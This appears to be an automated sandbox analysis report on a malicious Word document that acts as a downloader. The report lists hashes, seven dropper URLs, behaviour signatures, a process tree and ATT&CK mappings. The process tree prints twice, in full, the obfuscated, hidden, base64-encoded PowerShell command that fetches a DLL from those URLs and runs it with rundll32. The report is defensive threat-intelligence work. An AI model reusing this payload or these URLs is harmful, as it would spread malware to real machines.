Analysis

  • max time kernel
    136s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    14-01-2021 10:05

General

  • Target

    FILE_20210112.doc

  • Size

    162KB

  • MD5

    72ef97416a986dc5d6f9107ebbb8622f

  • SHA1

    0865e8361366d4f697d4a6ea1fd1896d5e07ef26

  • SHA256

    f52455990fc979638bdaa4072e82e820b5c2ad6e7a686c9e43d1c5ae7a6285a9

  • SHA512

    7749f8cd144eb39e76435dc2d7cdf03d61807768c516048f22fb1ffea7e2f68b98e65739e09f7d3c45524abbee2202911274caf46c7349d5f58f70f7244eb6cb

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.mitraship.com/wp-content/ZKeB/

exe.dropper

http://djsrecord.com/wp-includes/abop/

exe.dropper

https://lastfrontierstrekking.com/new/2OaabFU/

exe.dropper

https://watchnshirt.com/y/L7z9YcA/

exe.dropper

https://www.impipower.com/wp-content/U/

exe.dropper

https://www.inkayniperutours.com/druver/LtcG/

exe.dropper

https://vysimopoulos.com/d/NF/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\FILE_20210112.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4760
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAFMARQB0ACAAKAAiAHgAawAiACsAIgBxAG0AIgApACAAKAAgACAAWwB0AFkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ACIALQBGACcAWQAnACwAJwBzACcALAAnAFMAVABFAG0ALgBpAG8ALgAnACwAJwBkAEkAcgBFAGMAVABPAHIAWQAnACkAIAAgACkAOwAgACAAIAAgAFMAZQBUAC0AVgBhAHIASQBhAGIAbABFACAAIABFADMAagB2AEEATQAgACgAIABbAFQAWQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAwAH0AewA1AH0AewAyAH0AewA0AH0AIgAgAC0ARgAnAEUAcABvAGkAbgBUACcALAAnAHMAeQBzAFQAZQBNAC4AbgBlAFQALgBTAEUAcgB2AGkAJwAsACcAZQAnACwAJwBDACcALAAnAFIAJwAsACcAbQBBAE4AYQBHACcAKQAgACkAIAAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQAnACsAJwBsAGUAJwApACsAJwBuACcAKwAoACcAdABsAHkAQwAnACsAJwBvACcAKQArACcAbgB0ACcAKwAoACcAaQAnACsAJwBuAHUAJwApACsAJwBlACcAKQA7ACQAUQB6AGgAeABoADMAMAA9ACQASAAwADIAVgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA4ADYATwA7ACQAQwAxADkATwA9ACgAJwBaACcAKwAoACcAMAAnACsAJwBfAE8AJwApACkAOwAgACgAIAAgAEcARQB0AC0AVgBhAHIASQBBAEIATABlACAAIAAoACIAeABLACIAKwAiAFEATQAiACkAIAAtAFYAYQBMACkAOgA6ACIAQwBSAGAAZQBgAEEAVABgAGUARABJAFIAZQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAnAE4AeQBwADIAYgB2AGkAewAwAH0ATQA1ACcAKwAnAHIAZwAnACsAKAAnAHYANQAnACsAJwBuACcAKQArACcAewAwAH0AJwApACAAIAAtAEYAWwBjAEgAYQByAF0AOQAyACkAKQA7ACQASgA2ADIAUQA9ACgAJwBVACcAKwAoACcANwA0ACcAKwAnAFgAJwApACkAOwAgACgAIABHAGUAVAAtAFYAYQBSAGkAYQBCAEwARQAgAEUAMwBqAFYAYQBNACAAIAAtAHYAQQBsACAAKQA6ADoAIgBTAEUAYwB1AFIAaQBgAFQAYABZAHAAcgBgAG8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAFEAOQA0AFIAPQAoACgAJwBIADcAJwArACcAMgAnACkAKwAnAE4AJwApADsAJABGAGkAbwBjAGQAbgBhACAAPQAgACgAKAAnAFoAJwArACcAXwAzACcAKQArACcAVgAnACkAOwAkAEUAMABfAFAAPQAoACgAJwBIACcAKwAnADcAMwAnACkAKwAnAEgAJwApADsAJABVADUAdQBjADIANABqAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACcATgB5AHAAMgBiAHYAaQB7ADAAfQBNADUAcgBnACcAKwAnAHYANQAnACsAJwBuACcAKwAnAHsAMAB9ACcAKQAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQARgBpAG8AYwBkAG4AYQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVAA5ADYAVgA9ACgAKAAnAEMANQAnACsAJwA3ACcAKQArACcAUwAnACkAOwAkAEkAdQBjAG0AZABxADIAPQAoACcAdwAnACsAKAAnAF0AeABtAFsAdgA6ACcAKwAnAC8AJwArACcALwAnACkAKwAoACcAdwAnACsAJwB3AHcAJwApACsAKAAnAC4AbQAnACsAJwBpAHQAJwArACcAcgAnACsAJwBhAHMAaABpAHAALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AdAAvAFoASwBlAEIAJwArACcALwAnACkAKwAnAEAAJwArACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbAHYAOgAvAC8AJwArACcAZAAnACsAJwBqAHMAcgAnACkAKwAoACcAZQBjACcAKwAnAG8AcgAnACkAKwAoACcAZAAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwACcAKwAnAC0AaQBuAGMAbAB1ACcAKQArACgAJwBkAGUAJwArACcAcwAnACkAKwAoACcALwBhAGIAJwArACcAbwBwAC8AJwApACsAJwBAAHcAJwArACgAJwBdAHgAJwArACcAbQBbAHYAJwApACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbAAnACkAKwAoACcAYQBzACcAKwAnAHQAZgAnACsAJwByAG8AbgAnACkAKwAoACcAdABpAGUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AHIAJwArACcAZQBrAGsAJwApACsAKAAnAGkAbgAnACsAJwBnACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAG4AZQB3AC8AMgBPAGEAJwArACcAYQAnACkAKwAoACcAYgBGAFUAJwArACcALwBAAHcAXQB4ACcAKQArACgAJwBtAFsAdgBzADoALwAvAHcAYQB0AGMAJwArACcAaABuAHMAJwArACcAaABpACcAKwAnAHIAJwArACcAdAAuAGMAbwBtAC8AeQAnACsAJwAvACcAKwAnAEwANwB6ADkAWQBjACcAKwAnAEEALwBAACcAKwAnAHcAXQB4ACcAKwAnAG0AJwApACsAKAAnAFsAdgAnACsAJwBzADoALwAnACkAKwAnAC8AdwAnACsAKAAnAHcAdwAnACsAJwAuAGkAJwApACsAKAAnAG0AcAAnACsAJwBpAHAAJwArACcAbwAnACsAJwB3ACcAKwAnAGUAcgAuAGMAbwBtAC8AdwBwAC0AJwApACsAJwBjACcAKwAnAG8AJwArACgAJwBuAHQAZQBuAHQAJwArACcALwBVACcAKQArACcALwBAACcAKwAoACcAdwBdAHgAbQBbAHYAJwArACcAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwB3AHcALgAnACsAJwBpACcAKQArACcAbgAnACsAKAAnAGsAJwArACcAYQB5AG4AaQAnACkAKwAoACcAcABlAHIAdQB0ACcAKwAnAG8AJwArACcAdQByAHMALgBjAG8AJwArACcAbQAvAGQAJwApACsAKAAnAHIAJwArACcAdQB2AGUAJwArACcAcgAvACcAKwAnAEwAdABjAEcAJwApACsAKAAnAC8AQAB3ACcAKwAnAF0AeAAnACsAJwBtAFsAJwApACsAKAAnAHYAJwArACcAcwA6ACcAKQArACgAJwAvAC8AdgB5ACcAKwAnAHMAaQAnACkAKwAoACcAbQBvAHAAJwArACcAbwB1AGwAJwArACcAbwBzAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AZAAvAE4AJwArACcARgAvACcAKQApAC4AIgBSAGAAZQBQAEwAYABBAEMAZQAiACgAKAAnAHcAXQAnACsAKAAnAHgAbQAnACsAJwBbACcAKQArACcAdgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABIADkAMgBHACAAKwAgACQAUQB6AGgAeABoADMAMAAgACsAIAAkAEoAOQA1AFMAKQA7ACQATAA0ADQARQA9ACgAJwBZADgAJwArACcAOABLACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwB1AHEAMgAyAF8AaAAgAGkAbgAgACQASQB1AGMAbQBkAHEAMgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAHMAdABFAG0ALgBuAGUAVAAuAHcARQBCAGMATABpAGUAbgBUACkALgAiAGQATwB3AE4AbABgAG8AYABBAGQARgBgAGkAbABlACIAKAAkAFcAdQBxADIAMgBfAGgALAAgACQAVQA1AHUAYwAyADQAagApADsAJABBADcAMQBOAD0AKAAoACcATwAnACsAJwAyADQAJwApACsAJwBGACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABVADUAdQBjADIANABqACkALgAiAEwARQBOAGAAZwB0AGgAIgAgAC0AZwBlACAANAA1ADEANAA5ACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAFUANQB1AGMAMgA0AGoALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEAGkAJwArACcAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAVABPAGAAUwB0AHIAaQBOAEcAIgAoACkAOwAkAEkANgAzAEUAPQAoACgAJwBTACcAKwAnADgAOAAnACkAKwAnAEMAJwApADsAYgByAGUAYQBrADsAJABFADcAMgBTAD0AKAAnAEsANAAnACsAJwBfAEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBPAD0AKAAoACcAVAAnACsAJwA3ADgAJwApACsAJwBKACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:3164
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:3104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IAAgAFMARQB0ACAAKAAiAHgAawAiACsAIgBxAG0AIgApACAAKAAgACAAWwB0AFkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ACIALQBGACcAWQAnACwAJwBzACcALAAnAFMAVABFAG0ALgBpAG8ALgAnACwAJwBkAEkAcgBFAGMAVABPAHIAWQAnACkAIAAgACkAOwAgACAAIAAgAFMAZQBUAC0AVgBhAHIASQBhAGIAbABFACAAIABFADMAagB2AEEATQAgACgAIABbAFQAWQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAwAH0AewA1AH0AewAyAH0AewA0AH0AIgAgAC0ARgAnAEUAcABvAGkAbgBUACcALAAnAHMAeQBzAFQAZQBNAC4AbgBlAFQALgBTAEUAcgB2AGkAJwAsACcAZQAnACwAJwBDACcALAAnAFIAJwAsACcAbQBBAE4AYQBHACcAKQAgACkAIAAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQAnACsAJwBsAGUAJwApACsAJwBuACcAKwAoACcAdABsAHkAQwAnACsAJwBvACcAKQArACcAbgB0ACcAKwAoACcAaQAnACsAJwBuAHUAJwApACsAJwBlACcAKQA7ACQAUQB6AGgAeABoADMAMAA9ACQASAAwADIAVgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA4ADYATwA7ACQAQwAxADkATwA9ACgAJwBaACcAKwAoACcAMAAnACsAJwBfAE8AJwApACkAOwAgACgAIAAgAEcARQB0AC0AVgBhAHIASQBBAEIATABlACAAIAAoACIAeABLACIAKwAiAFEATQAiACkAIAAtAFYAYQBMACkAOgA6ACIAQwBSAGAAZQBgAEEAVABgAGUARABJAFIAZQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAnAE4AeQBwADIAYgB2AGkAewAwAH0ATQA1ACcAKwAnAHIAZwAnACsAKAAnAHYANQAnACsAJwBuACcAKQArACcAewAwAH0AJwApACAAIAAtAEYAWwBjAEgAYQByAF0AOQAyACkAKQA7ACQASgA2ADIAUQA9ACgAJwBVACcAKwAoACcANwA0ACcAKwAnAFgAJwApACkAOwAgACgAIABHAGUAVAAtAFYAYQBSAGkAYQBCAEwARQAgAEUAMwBqAFYAYQBNACAAIAAtAHYAQQBsACAAKQA6ADoAIgBTAEUAYwB1AFIAaQBgAFQAYABZAHAAcgBgAG8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAFEAOQA0AFIAPQAoACgAJwBIADcAJwArACcAMgAnACkAKwAnAE4AJwApADsAJABGAGkAbwBjAGQAbgBhACAAPQAgACgAKAAnAFoAJwArACcAXwAzACcAKQArACcAVgAnACkAOwAkAEUAMABfAFAAPQAoACgAJwBIACcAKwAnADcAMwAnACkAKwAnAEgAJwApADsAJABVADUAdQBjADIANABqAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACcATgB5AHAAMgBiAHYAaQB7ADAAfQBNADUAcgBnACcAKwAnAHYANQAnACsAJwBuACcAKwAnAHsAMAB9ACcAKQAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQARgBpAG8AYwBkAG4AYQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVAA5ADYAVgA9ACgAKAAnAEMANQAnACsAJwA3ACcAKQArACcAUwAnACkAOwAkAEkAdQBjAG0AZABxADIAPQAoACcAdwAnACsAKAAnAF0AeABtAFsAdgA6ACcAKwAnAC8AJwArACcALwAnACkAKwAoACcAdwAnACsAJwB3AHcAJwApACsAKAAnAC4AbQAnACsAJwBpAHQAJwArACcAcgAnACsAJwBhAHMAaABpAHAALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AdAAvAFoASwBlAEIAJwArACcALwAnACkAKwAnAEAAJwArACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbAHYAOgAvAC8AJwArACcAZAAnACsAJwBqAHMAcgAnACkAKwAoACcAZQBjACcAKwAnAG8AcgAnACkAKwAoACcAZAAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwACcAKwAnAC0AaQBuAGMAbAB1ACcAKQArACgAJwBkAGUAJwArACcAcwAnACkAKwAoACcALwBhAGIAJwArACcAbwBwAC8AJwApACsAJwBAAHcAJwArACgAJwBdAHgAJwArACcAbQBbAHYAJwApACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbAAnACkAKwAoACcAYQBzACcAKwAnAHQAZgAnACsAJwByAG8AbgAnACkAKwAoACcAdABpAGUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AHIAJwArACcAZQBrAGsAJwApACsAKAAnAGkAbgAnACsAJwBnACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAG4AZQB3AC8AMgBPAGEAJwArACcAYQAnACkAKwAoACcAYgBGAFUAJwArACcALwBAAHcAXQB4ACcAKQArACgAJwBtAFsAdgBzADoALwAvAHcAYQB0AGMAJwArACcAaABuAHMAJwArACcAaABpACcAKwAnAHIAJwArACcAdAAuAGMAbwBtAC8AeQAnACsAJwAvACcAKwAnAEwANwB6ADkAWQBjACcAKwAnAEEALwBAACcAKwAnAHcAXQB4ACcAKwAnAG0AJwApACsAKAAnAFsAdgAnACsAJwBzADoALwAnACkAKwAnAC8AdwAnACsAKAAnAHcAdwAnACsAJwAuAGkAJwApACsAKAAnAG0AcAAnACsAJwBpAHAAJwArACcAbwAnACsAJwB3ACcAKwAnAGUAcgAuAGMAbwBtAC8AdwBwAC0AJwApACsAJwBjACcAKwAnAG8AJwArACgAJwBuAHQAZQBuAHQAJwArACcALwBVACcAKQArACcALwBAACcAKwAoACcAdwBdAHgAbQBbAHYAJwArACcAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwB3AHcALgAnACsAJwBpACcAKQArACcAbgAnACsAKAAnAGsAJwArACcAYQB5AG4AaQAnACkAKwAoACcAcABlAHIAdQB0ACcAKwAnAG8AJwArACcAdQByAHMALgBjAG8AJwArACcAbQAvAGQAJwApACsAKAAnAHIAJwArACcAdQB2AGUAJwArACcAcgAvACcAKwAnAEwAdABjAEcAJwApACsAKAAnAC8AQAB3ACcAKwAnAF0AeAAnACsAJwBtAFsAJwApACsAKAAnAHYAJwArACcAcwA6ACcAKQArACgAJwAvAC8AdgB5ACcAKwAnAHMAaQAnACkAKwAoACcAbQBvAHAAJwArACcAbwB1AGwAJwArACcAbwBzAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AZAAvAE4AJwArACcARgAvACcAKQApAC4AIgBSAGAAZQBQAEwAYABBAEMAZQAiACgAKAAnAHcAXQAnACsAKAAnAHgAbQAnACsAJwBbACcAKQArACcAdgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABIADkAMgBHACAAKwAgACQAUQB6AGgAeABoADMAMAAgACsAIAAkAEoAOQA1AFMAKQA7ACQATAA0ADQARQA9ACgAJwBZADgAJwArACcAOABLACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwB1AHEAMgAyAF8AaAAgAGkAbgAgACQASQB1AGMAbQBkAHEAMgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAHMAdABFAG0ALgBuAGUAVAAuAHcARQBCAGMATABpAGUAbgBUACkALgAiAGQATwB3AE4AbABgAG8AYABBAGQARgBgAGkAbABlACIAKAAkAFcAdQBxADIAMgBfAGgALAAgACQAVQA1AHUAYwAyADQAagApADsAJABBADcAMQBOAD0AKAAoACcATwAnACsAJwAyADQAJwApACsAJwBGACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABVADUAdQBjADIANABqACkALgAiAEwARQBOAGAAZwB0AGgAIgAgAC0AZwBlACAANAA1ADEANAA5ACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAFUANQB1AGMAMgA0AGoALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEAGkAJwArACcAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAVABPAGAAUwB0AHIAaQBOAEcAIgAoACkAOwAkAEkANgAzAEUAPQAoACgAJwBTACcAKwAnADgAOAAnACkAKwAnAEMAJwApADsAYgByAGUAYQBrADsAJABFADcAMgBTAD0AKAAnAEsANAAnACsAJwBfAEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBPAD0AKAAoACcAVAAnACsAJwA3ADgAJwApACsAJwBKACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3100
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dll,ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:640
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dll,ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1080
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ocfrm\yoae.yip",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:2912

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dll
      MD5

      43f85170b4c974b94c108465ff52ba20

      SHA1

      c1ef0c373c396000f8ef76a0f619b3872c30b4fc

      SHA256

      461bfeb6067704d94e746a0e8e3b965410e9f89e0bc39d331460acf5d05e491f

      SHA512

      610650e4891a94232136852041e52939e8e8aad2db0b4450321b8dae508c827ce24530d4e54702222a8cdca879abf1677eb42e15f4066babc2a9741e2be11cca

    • \Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dll
      MD5

      43f85170b4c974b94c108465ff52ba20

      SHA1

      c1ef0c373c396000f8ef76a0f619b3872c30b4fc

      SHA256

      461bfeb6067704d94e746a0e8e3b965410e9f89e0bc39d331460acf5d05e491f

      SHA512

      610650e4891a94232136852041e52939e8e8aad2db0b4450321b8dae508c827ce24530d4e54702222a8cdca879abf1677eb42e15f4066babc2a9741e2be11cca

    • memory/640-8-0x0000000000000000-mapping.dmp
    • memory/1080-10-0x0000000000000000-mapping.dmp
    • memory/2912-12-0x0000000000000000-mapping.dmp
    • memory/3100-4-0x0000000000000000-mapping.dmp
    • memory/3100-5-0x00007FFAE1F50000-0x00007FFAE293C000-memory.dmp
      Filesize

      9.9MB

    • memory/3100-6-0x0000020C8A500000-0x0000020C8A501000-memory.dmp
      Filesize

      4KB

    • memory/3100-7-0x0000020CA2F30000-0x0000020CA2F31000-memory.dmp
      Filesize

      4KB

    • memory/3104-3-0x0000000000000000-mapping.dmp
    • memory/4760-2-0x00007FFAEA6A0000-0x00007FFAEACD7000-memory.dmp
      Filesize

      6.2MB